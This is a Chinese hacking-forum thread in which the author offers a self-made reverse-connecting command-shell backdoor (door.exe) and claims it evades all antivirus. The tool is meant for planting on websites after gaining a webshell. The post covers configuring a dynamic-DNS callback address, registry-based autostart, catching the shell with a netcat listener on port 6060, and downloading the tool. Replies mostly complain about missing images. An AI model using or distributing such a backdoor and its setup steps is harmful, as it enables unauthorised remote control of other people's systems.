个人版cmdshell 完全免杀~!( supershell)
每次拿到一个站的webshell的时候,想上传木马或者反回一个cmdshell的时候,苦于老被杀掉,做免杀麻烦,保质期也不长, 所以特别地昨天抽了一天的空, 写个cmdshell, 个人版的东西可都是完全不会被查杀的`````所以昨天写的这个shell可以过全部杀软~
拿出来给大家分享下, 虽然公布意味着其生命的结束, 但是技术就是在交流中才能得到提高~!
shell的主界面如下~!:
[img]http://hiphotos.baidu.com/wordsonwing/pic/item/715c098fe2c664fcf11f364c.jpg[/img]
MFC编写的, 在反向连接中写入你的DNS空间的域名. 我这里是花生壳的,端口写上shell的上线端口,然后直接点生成就可以在目录下生成一个叫door.exe的程序~! 如图:
[img]http://hiphotos.baidu.com/wordsonwing/pic/item/2b6e371365b992c2f6039e50.jpg[/img]
双击那个door.exe shell的服务端就可以运行. 由于时间关系,客户端没写,不过NC完全可以代替~!,
方法如下:
先打开nc,监听刚才在配置程序的时候写的上线端口 :nc -v -l -p 6060
[img]http://hiphotos.baidu.com/wordsonwing/pic/item/935d14ec8fba933563d09f5b.jpg[/img]
接着运行服务端,NC会反回一个cmdshell~!
[img]http://hiphotos.baidu.com/wordsonwing/pic/item/155f1c44e599a990b3b7dc27.jpg[/img]
由于我是在本机运行的,所以反回的是本机shell,在这个shell里只要你对DOS命令熟悉,没什么干不了的...
零零碎碎用了一天的时间,很多地方还不完善,比如隐藏性不高,程序使用的是注册表上线,本来打算使用DLL注入的, 等到以后有时间了在逐渐完善~!
刚才出有点小问题,```自启动启动不了, 原来是copyfile函数的一个参数写错了,现在解决了~!
这个cmdshell我上传到我的空间里去了,大家可以去下载~!
下载地址:[url]http://shminow.googlepages.com/supershell.rar[/url]
如果有什么问题可以来我的BLOG找我:[url]http://hi.baidu.com/wordsonwing[/url]
::08:: ::08:: 图片都看不见啊~~~~~~~~~~~~~ cmdshell还真没用过,不知到好不好用,反正先顶一下再说! 怎么都看不到图片啊::18:: ::18:: ::08:: ::08:: 图是看不到``````````估计是baidu做的限制
把图片地址发出来, 大家可以把这个地址给复制了看。。。
图1:[img]http://hiphotos.baidu.com/wordsonwing/pic/item/715c098fe2c664fcf11f364c.jpg[/img]
图2:[img]http://hiphotos.baidu.com/wordsonwing/pic/item/2b6e371365b992c2f6039e50.jpg[/img]
图3:[img]http://hiphotos.baidu.com/wordsonwing/pic/item/935d14ec8fba933563d09f5b.jpg[/img]
图4:[img]http://hiphotos.baidu.com/wordsonwing/pic/item/155f1c44e599a990b3b7dc27.jpg[/img]
或者来我的BLOG来看:[url]http://hi.baidu.com/wordsonwing[/url] ::03:: 晕。。。你能截个图传上来吗。、。。。 看不到图片啊 ..晕::22:: ::22:: ::22:: 看不到截图啊::18:: ::18:: ::18:: ::18:: ::18:: ::18::
页:
[1]
